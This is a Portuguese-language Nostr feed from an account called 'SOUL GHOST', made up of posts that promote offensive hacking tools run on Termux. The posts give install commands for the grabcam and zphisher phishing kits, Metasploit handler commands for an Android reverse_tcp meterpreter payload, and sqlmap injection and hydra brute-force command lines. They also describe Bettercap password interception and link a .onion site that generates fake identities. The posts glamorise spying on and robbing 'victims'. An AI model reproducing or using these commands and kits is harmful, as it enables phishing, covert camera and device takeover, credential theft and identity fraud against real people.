SOUL GHOST's avatar
SOUL GHOST
npub1xa49...5cht
SOUL GHOST's avatar
SOUL GHOST 3 months ago
image **O que é e como funciona o Grabcam?** O grabcam é um script simples, geralmente escrito em Shell e PHP, projetado para criar uma página de phishing que engana o usuário para que ele conceda acesso à sua câmera. > Não é uma ferramenta avançada, mas serve como um excelente exemplo prático para entender os conceitos básicos de engenharia social e ataques de phishing. image O funcionamento geralmente segue estes passos: 1.Execução do Script: Ao rodar o grabcam.sh, o script inicia um servidor web local (usando PHP) e gera um link malicioso. 2.Engenharia Social: O próximo passo, que não faz parte da ferramenta em si, é a engenharia social. O atacante precisa convencer a vítima a clicar nesse link. O link geralmente é mascarado para parecer algo legítimo, como um prêmio, um site de notícias ou um portal de login. 3.Página Falsa (Phishing): Quando a vítima acessa o link, ela se depara com uma página falsa que solicita permissão para acessar a câmera do dispositivo (celular ou computador). A página pode usar pretextos como "verificação de identidade por foto" ou "teste de webcam". 4.Captura de Imagem: Se a vítima conceder a permissão, o site tira uma ou mais fotos usando a câmera frontal do dispositivo e as envia para o servidor do atacante, que no caso do grabcam, é a máquina onde o script foi executado. 5.Armazenamento : As imagens capturadas são salvas em um diretório no computador do atacante, que pode então visualizá-las. Comandos de instalação no termux: apt-get update -y e apt-get upgrade -y pkg install python -y e pkg install python2 -y pkg install git -y pip install lolcat git clone https://github.com/noob-hackers/grab cd grabcam bash grabcam.sh Em resumo, o grabcam não é uma ferramenta "grandiosa" ou complexa, mas é um excelente ponto de partida para estudantes de segurança da informação. Ele demonstra de forma clara e prática como um ataque de phishing pode ser construído e como a engenharia social é crucial para o sucesso de um ataque.
SOUL GHOST's avatar
SOUL GHOST 4 months ago
image Hoje eu quero te mostrar um site da **deep web** que chama bastante atenção. O endereço é: elfqv3zjfegus3bgg5d7pv62eqght4h6sl6yjjhe7kjpi2s56bzgk2yd.onion. >Ele é um gerador de identidades falsas. Ali, você encontra nomes, endereços, números de documentos e até dados bancários, tudo criado do zero. >Muita gente olha pra isso e pensa logo no uso errado. Mas a real é que esses sites existem também pra simulações, pra testes de segurança e até pra estudos sobre engenharia social. A questão é simples: **esse tipo de recurso pode ser uma arma… ou só mais uma ferramenta de conhecimento. Depende de quem usa.** Agora me diz, o que você faria se tivesse acesso a uma identidade que nunca existiu? Na deep web, o poder não está só nos códigos, mas em saber o que poucos sabem. #deepweb #hackers #nostr #bitcoin #fakeid #hacking #Brasil #digital #id #onion #darkweb
SOUL GHOST's avatar
SOUL GHOST 6 months ago
Tenho que admitir que isso ficou bom. #lula #janja #13 #Brasil #Brazil #circo #bitcoin #nostr #palhaço
SOUL GHOST's avatar
SOUL GHOST 7 months ago
image > DEFESA-ATAQUE – INJECTOR DE PACOTES COM BETTERCAP Você já ouviu o ditado: "Quem controla a rede, controla o jogo." **Bettercap** é isso Uma caixa de ferramentas de manipulação de tráfego em tempo real. Mas no **Termux**… é como carregar um míssil em um celular. Quer mapear dispositivos conectados? Interceptar logins em HTTP? Injetar código em páginas? Monitorar redes Wi-Fi? Tudo isso, sem precisar de root. Sim. Ele roda direto no seu bolso. Você vira o meio do caminho entre vítima e internet. Cada clique dela passa por você. Cada senha. Cada requisição. Cada falha. > Porque às vezes o poder não está no ataque. Está na posição certa, na hora certa — e com a ferramenta certa. #bettercap #networkhacking #maninthemiddle #termux #packetinjection #nostr #infosec #hacking #cibersegurança #cibersecurity
SOUL GHOST's avatar
SOUL GHOST 7 months ago
image > EXPLOIT – METASPLOIT Tem gente que invade gritando. Outros… entram como fantasmas. Metasploit não é só uma ferramenta — É um campo de batalha inteiro dentro do seu Termux. Você não precisa quebrar portas. Você abre fechaduras com classe. use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost SEU_IP set lport 4444 run A vítima toca na tela. Você ganha um portal direto pro sistema dela. Câmera? Sua. Microfone? Seu. Arquivos, localização, acesso total? Também seus. Sem alarme. Sem rastros. Sem chance de defesa. Você não está ali só pra invadir. Você tá ali pra dominar sem ser notado. Porque quem sabe o que faz... nunca é visto chegando. > E o mundo digital não pertence a quem tem mais força. Pertence a quem tem mais consciência tática. #metasploit #cyberintel #termux #invasão #ethicalhacking #nostr #deeptech
SOUL GHOST's avatar
SOUL GHOST 7 months ago
> Você confia nos formulários que preenche? Muitos sites coletam dados. Mas nem todos sabem proteger o que coletam. **Sqlmap** é como uma chave mestra para os bancos de dados expostos. Ele testa, injeta, coleta… Sem fazer barulho. Um campo de login mal protegido… E o banco de dados pode virar um livro aberto. Exemplo: **sqlmap -u "http://site.com/page.php?id=1" --dbs** Você não vê. Mas a brecha tá lá. E quem sabe onde mirar… vê tudo. > O ataque mais perigoso… é o invisível. #sqlmap #termux #sqlinjection #pentest #hackingetico #nostr #infosec #cybersecurity
SOUL GHOST's avatar
SOUL GHOST 7 months ago
image > O elo mais fraco da segurança… sempre foi o humano. Você pode ter a melhor senha do mundo. Mas e se for você mesmo quem a entrega? **Zphisher** explora isso: Cria páginas falsas. Réplicas perfeitas. Gatilhos para quem clica sem pensar. Em segundos, você vê o que as vítimas digitam. Tudo porque confiaram na aparência. > O golpe não força. Ele convida. A pergunta é: Você cairia? Codigo de instalação: **pkg update && pkg upgrade pkg install git -y pkg install php -y pkg install openssh -y pkg install wget -y git clone cd zphisher bash zphisher.sh** #zphisher #termux #phishing #engenhariasocial #cybersecurity #nostr #hackingetico #consciênciadigital
SOUL GHOST's avatar
SOUL GHOST 7 months ago
image **Nem sempre o ataque vem pelo código.** Às vezes, ele vem pela confiança. Hackers experientes sabem: É mais fácil enganar uma pessoa do que invadir um sistema. É aí que entra a engenharia social. Fingir ser alguém, manipular uma conversa, montar um cenário perfeito… Tudo pra levar a vítima a entregar o que você precisa. > Senhas. Acesso. Informações. Tudo oferecido de bandeja… por quem achou que estava seguro. . . . O código impressiona. Mas é a mente que abre portas. #engenhariasocial #hacking #hackerethico #termux #nostr #cybersecurity #osint #mindgames #soulghost
SOUL GHOST's avatar
SOUL GHOST 7 months ago
image **Você já analisou o tráfego de uma rede direto do celular?** Com o tshark, isso é possível, e o melhor: sem precisar de root. O tshark é a versão em linha de comando do Wireshark. Serve pra abrir arquivos .pcap (capturas de rede) e farejar tudo: IPs, senhas, sites, requisições... Tudo em texto puro. Rápido. Preciso. Hacker. Exemplo simples: tshark -r captura.pcap Isso já mostra cada pacote registrado. Curioso com logins, senhas, domínios e GETs? Dá pra filtrar só o que importa. E claro: direto do Termux. O jogo mudou. Agora é você quem analisa a rede. #tshark #termux #hacking #pcap #ethicalhacking #nostr
SOUL GHOST's avatar
SOUL GHOST 7 months ago
image **Você sabe o que é um ataque de força bruta?** É quando você tenta quebrar um login testando centenas de senhas automaticamente. A ferramenta hydra faz exatamente isso. E o melhor: Roda direto do seu celular. Exemplo básico: hydra -l admin -P senhas.txt ftp://192.168.0.100 Essa linha tenta invadir um servidor FTP local usando a lista senhas.txt. Mas não se engane: o poder da ferramenta está em quem entende como, onde e quando usar. #termux #hydra #bruteforce #hacking #ethicalhacking #nostr
SOUL GHOST's avatar
SOUL GHOST 7 months ago
image > Antes de invadir, o hacker inteligente investiga. Com o comando whois, você consegue descobrir quem registrou um domínio, onde ele está hospedado, e quais são os contatos técnicos e administrativos. Tudo isso com um comando simples direto do seu celular: whois dominio.com Informação é poder. E quem domina OSINT, domina o jogo. #termux #hacking #osint #whois #infosec #nostr
SOUL GHOST's avatar
SOUL GHOST 7 months ago
image **Já ouviu falar em nmap?** É uma das ferramentas mais importantes da segurança ofensiva. Com ela, você descobre quais portas estão abertas, quais serviços estão rodando e até que sistema operacional seu alvo usa — tudo isso com uma linha de comando. E sim: ela roda direto do seu celular com Termux. Quer brincar de hacker ou entender de verdade o que rola por trás da rede? Comece escaneando a sua própria. Depois a coisa fica séria. #hacking #termux #nmap #networksecurity #nostr